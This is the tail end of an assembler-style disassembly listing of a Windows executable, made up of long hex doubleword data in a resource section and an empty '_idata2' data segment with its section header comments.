dd 0C1803839h, 0C556D07h, 3A1087B8h, 3E4F3B3Ah, 0BB114E67h
dd 5D92DE42h, 0A57EC5C5h, 2CFC0219h, 4008CAADh, 0E247338h
dd 2A5B2F42h, 0B9FA9E7Ah
dd 1BC27121h, 0B94FC5D5h, 26CC342Ch, 62C780CFh, 86F84B86h
dd 0E9E2627Dh, 0CDE64E52h, 34760EC5h, 3B05F7CAh, 63B934B9h
dd 31B131BBh, 0FFB47C54h, 326E1C67h, 0C6803C6Ah, 0A846C06h
dd 747388B9h, 0D0159514h, 9F0F97B8h, 89E5D60h, 0EE2CAE94h
dd 0AE41D656h, 0F2B7F80Dh, 0AE61F78Ah, 2B6C3411h, 329398E7h
dd 0B68B2331h, 0E936DB24h, 68A6AA41h, 0AB6ED1D0h, 0B482222Fh
dd 5B1CDEDDh, 33187F33h, 3547234Fh, 0C501F60Eh, 0E11B2E2Dh
dd 0E415A50Ah, 0DE08C015h, 0EB44ECF7h, 6D2C9AE7h, 2262F612h
dd 0FFB8DE8Ah, 14C45750h, 9C5CEC86h, 1E35C738h, 6A2FF7EBh
dd 4B3B5897h, 9D4EE6E4h, 9DDD701Eh, 0D8D88805h, 0E2FCA48Ch
dd 664599AEh, 8FF3B382h, 0EA54BCB3h, 0C9161F6Ch, 0CC56261h
dd 1859F3E0h, 0A6786C01h, 5E2C100Fh, 0C6079E9Fh, 793ABAD1h
dd 21A7BE8Dh, 74B64FDDh, 6E91568Ch, 62B3E6Ch, 2353D736h
dd 0C7AB4A0Eh, 520A7217h, 44EEA9A9h, 60911550h, 4DB32A23h
dd 7FF078FEh, 826692E7h, 0AEFEDCF2h, 0B8915606h, 0BCCDB92Ch
dd 0CF82E5A1h, 0DB1CB53Ah, 0E1A004C8h, 750B2CD2h, 0B9EBC5E7h
dd 0E7DF34F1h, 0A9E9B1AFh, 3613117Ah, 52F7A2F5h, 56A81CEAh
dd 0E9D8473Dh, 75B62FCAh, 90CB4DDDh, 94E54DCFh, 7736EC96h
dd 9F461E73h, 82061B2Bh, 0D3522FA5h, 0DC2F3A3Ah, 0F101E90Dh
dd 0F12951E8h, 78AF171Eh, 9FDF77ECh, 0A7892C59h, 42AAB2A2h
dd 7CA217B0h, 0EA038B4h, 0DAAD7564h, 0D6E3CD2h, 1F419B9Ch
dd 1A6BD34Dh, 0BD8282E8h, 6A7A1211h, 99C5EF3h, 0DA99011Ch
dd 6A3CE4FBh, 46881FDAh, 0B0488FDEh, 0B192E564h, 2D853CE9h
dd 0A6F5C68Fh, 9961E56h, 0F757A0A8h, 6D42BB33h, 0A33A2A0Bh
dd 91E61E51h, 9C01DB16h, 90CC87C4h, 2F6CE008h, 90DA9797h
dd 63AF5F10h, 0E73E9895h, 428B6360h, 8418ADECh, 81BE4044h
dd 5515BBB9h, 55BC83A3h, 950F687h, 65CE23A1h, 329A3231h
dd 0BB7E91C0h, 5B78C4AFh, 8AC3E0EFh, 96E77A5Dh, 3D85FE94h
dd 0E4F844E5h, 448518F5h, 0B0318AACh, 9CF33C36h, 0C3182E5Eh
dd 8E07D85Bh, 7A5901BAh, 0A1E17972h, 10A9B484h, 935798A8h
dd 6351BDD7h, 1F9AB787h, 0DB221339h, 0FE0EFA29h, 98FCC3E5h
dd 905DF5C5h, 9CC27A08h, 51B23F14h, 985DF2A3h, 7626A6CCh
dd 12A9C2F2h, 0E8952C52h, 0BCC41F6Ah, 98E85C8Eh, 899A0DB0h
dd 5E979FFAh, 0BA78E944h, 3601DCCCh, 65D1B334h, 3BBE2727h
dd 3E489377h, 1364C014h, 5564DF88h, 0CE20B2E1h, 0F12E2B0Ch
dd 3F2FAA29h, 0E12189ADh, 5FD9633Ch, 40D8A2h, 0BEFC01F2h
dd 0E0E277F6h, 0ADEEB6A8h, 0B9B90761h, 0CC3D8502h, 5B9D3534h
dd 0C5D24105h, 93BC5463h, 0F5B41DEAh, 99DEB02Fh, 695B78Ch
dd 48AF91A0h, 76A52C8Ah, 29E033AEh, 6513C431h, 70BECFCDh
dd 84F76F5Eh, 0EB00EE86h, 93C920E9h, 3DB5880Bh, 0C204381Eh
dd 154072Ah, 0B120D1E9h, 70DB4A23h, 5682DAD8h, 0A420FC97h
dd 0E7E3F8C7h, 9C6B8878h, 0B47F1712h, 0FD3EA120h, 5713BB35h
dd 612DF5F4h, 4B8D46C1h, 611EB5E3h, 0F242373h, 295B2F17h
dd 0B7056A12h, 478E22A4h, 2819DBAFh, 5699468Ah, 0E7AD2FCEh
dd 6C85072h, 91581015h, 0A4E67D94h, 36D8B85h, 0A369DABh
dd 2C4EE28h, 0B320D6EBh, 41B3F9B5h, 94BCDBE9h, 90E2419Ch
dd 0A46E397Dh, 0AFF08B4Dh, 0BB09D124h, 0CE3F97B9h, 35CE6667h
dd 0ED21C6DAh, 392BA905h, 894DD5C8h, 0E5587BB4h, 0A36C0400h
dd 89CBB017h, 300E021h, 0B8490A88h, 0B5994240h, 6CE10CCh
dd 34080A8h, 1668C0C1h, 1DDB34F5h, 347714C1h, 5054CAFh
dd 0B261DFDBh, 0D3023832h, 7D764D7Bh, 0FB42976Dh, 0C25E5D89h
dd 62D5F5E1h, 0F9218A9Dh, 3CA9D873h, 902A2977h, 0A7CE5140h
dd 6D66D9B2h, 0FBE5B2Ch, 31056D3Ah, 9FC937FEh, 6FE01546h
dd 630B6BDBh, 0CCB7E501h, 0D92B83AAh, 2C201A82h, 70B3DEF4h
dd 87CA62D8h, 269A31DCh, 96C6B74Dh, 4562020h, 8E73D1BDh
dd 24FB415Fh, 8A4F90DDh, 79BB212Ah, 652CE1F8h, 0F7B90D19h
dd 411188DAh, 0C59AA8B7h, 6FB86A6Dh, 9B65E787h, 2FCD574Ah
dd 8159E6A6h, 0CEF3731h, 6770C885h, 0BDFC474Bh, 580A6F72h
dd 9BCCA8FCh, 2DE4404Bh, 0EB21C0DAh, 10D83762h, 0DB06B6BDh
dd 0ECB90C03h, 28608095h, 88D5BFA2h, 570B7766h, 0CB36C5F3h
dd 0DE66BB24h, 0D517A430h, 0F7F9FF4Dh, 0AAB4DA35h, 0AC546419h
dd 4D16B78Fh, 39307FFEh, 5A0E90E4h, 61129A99h, 654BB905h
dd 1E44673Ah, 0AEE66D8h, 0E176310h, 4100A852h, 622D3AD9h
dd 548BCFD1h, 0A3700D6Bh, 0DB1DB79Fh, 6AAD1D2Bh, 0BD48FD2h
dd 0FD339B9Fh, 2D678D1h, 25EAB2B1h, 0F8511324h, 0F4352CD1h
dd 0D13DC2D2h, 0E7564D67h, 520DE5C3h, 0F6BBDFEDh, 5B5DADC9h
dd 99E8F617h, 0B3C4A273h, 715B97E7h, 0B32F0763h, 1B9F3D48h
dd 0D11EC8BEh, 0F49E66F3h, 647FD504h, 0EAE044A5h, 0A54DEBEFh
dd 0EE7A5197h, 4C8F1715h, 9946F389h, 569C3244h, 0FB6F9680h
dd 75E84E17h, 275C0B0Dh, 0A9A6D7CAh, 68460165h, 0BC0AF2E8h
dd 4DB0F3Bh, 6226C1EFh, 8946AF0Eh, 361B6520h, 0A63C6F5Eh
dd 0DA986114h, 89F60672h, 0CB544Bh, 2D3328A4h, 3599C3C4h
dd 0FD7D9E89h, 7E3D47DEh, 5205D716h, 24EE4B4Ah, 0D08EF719h
dd 0EB53C8AAh, 48142768h, 0EDE04848h, 9081AF9Dh, 7931292Ah
dd 73319B9Ch, 0AB527C7h, 43EC8484h, 0C583EA4Ah, 0CA0BA34Ah
dd 0B41A6E32h, 0E91AEBF8h, 78BB60B8h, 3AB685E0h, 0A7FBC5FBh
dd 0AE03FFCFh, 0E54B0EADh, 44862E2Eh, 7BFDA7D8h, 8D5AC2C3h
dd 0F434CDDFh, 0CEFADD3Ah, 1BD6E4B1h, 29E27A7Ah, 0EF713654h
dd 913A18FFh, 0A814266Ch, 1720B8B8h, 4FB05E0Bh, 7A30D7D7h
dd 8ECF678Ch, 1C02B500h, 0AD0C0189h, 42FC1515h, 0EC2C8484h
dd 8F183B14h, 32BC3C3h, 8544AEF4h, 0A8360EDh, 0DB527172h
dd 38238A09h, 0B38B51BBh, 4363E02Ch, 9C9E67ADh, 4E22B62Eh
dd 1D36FEFDh, 7B39A30Bh, 14554204h, 8479F77Ch, 31743C3Bh
dd 0F233B007h, 0ADFDC32Ah, 652D4546h, 70B24AC6h, 30626C53h
dd 0D15B6858h, 0F781F4CBh, 51117BD0h, 77FF6B64h, 0CD0DC581h
dd 0A63BED5h, 6138BEC7h, 4BAC54E1h, 1B31E0E3h, 9ADC81CAh
dd 8C995502h, 0BA1A9020h, 19D685D3h, 4529BFFDh, 662AC7B2h
dd 7F51CFCEh, 7A38C4CEh, 0F0860612h, 2FBF8282h, 79760146h
dd 0C545118Bh, 0DBBC6F00h, 0E223E43Dh, 51F58C4Ah, 2162FAF9h
dd 1BF922E0h, 0A5EBE8B2h, 0AFDFB7AFh, 4D775D2Eh, 0C6442FA5h
dd 0DE8E7437h, 662D9DA6h, 4C8D7AD0h, 40EE5E4h, 0A88B3075h
dd 8E067D1h, 0E1F81DF6h, 788D9FA2h, 0D719B180h, 9855D5C4h
dd 0D48D2F30h, 79C8506Fh, 267B827Bh, 0BA53817Eh, 0CB763E3Dh
dd 0F42E5009h, 5818A02Ch, 6E248C8Bh, 42845FDEh, 68118ADAh
dd 9667956Ah, 0DE61C9C9h, 80DCED1Ch, 3835E718h, 300F9797h
dd 6EB4FAA2h, 119B4BC6h, 82BE6678h, 3D7DE650h, 9232275h
dd 2B5C2859h, 8AFC3610h, 8A8B2312h, 0D91AB259h, 69C01F41h
dd 0D2D43C51h, 77916150h, 6FDD31E0h, 23E74F6Ah, 0FDF4CCCEh
dd 4096E62h, 648356A8h, 0F4187EBCh, 6B5674Ch, 7FC5BAC7h
dd 0E3BF674Fh, 0CA02E98Fh, 4E0E764Eh, 1B691C6Ch, 38EF5755h
dd 0A05FC7EAh, 0C2D0E9A6h, 6C8B012Fh, 0E4EC35Eh, 38351576h
dd 5992FAFAh, 9FB81FADh, 0B539A913h, 511B839Ch, 0E8CD4B12h
dd 8A38D4EBh, 88A23444h
dd 93590EF0h, 0F5E8EA44h, 9FEDEF5Fh, 4507AFB2h, 6B1627EAh
dd 0B91981E1h, 0B2354D38h, 0F94D35D8h, 0EC3C9393h, 429C0404h
dd 0B2863248h, 0F0691A1Ah, 0D1118611h, 60B1D139h, 0D0F2C8C8h
dd 7FF0E058h, 0CA7E7E7h, 5CDE7677h, 79E30622h, 923099B1h
dd 378DDDA7h, 0DBF4D4AAh, 0E1AC4443h, 0A70BF786h, 644A79E9h
dd 196AD946h, 57078669h, 33BB70EFh, 150Dh dup(0)
dd 7Ch dup(?)
_rsrc ends
; Section 3. (virtual address 00021000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00020200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 421000h
align 2000h
_idata2 ends
end start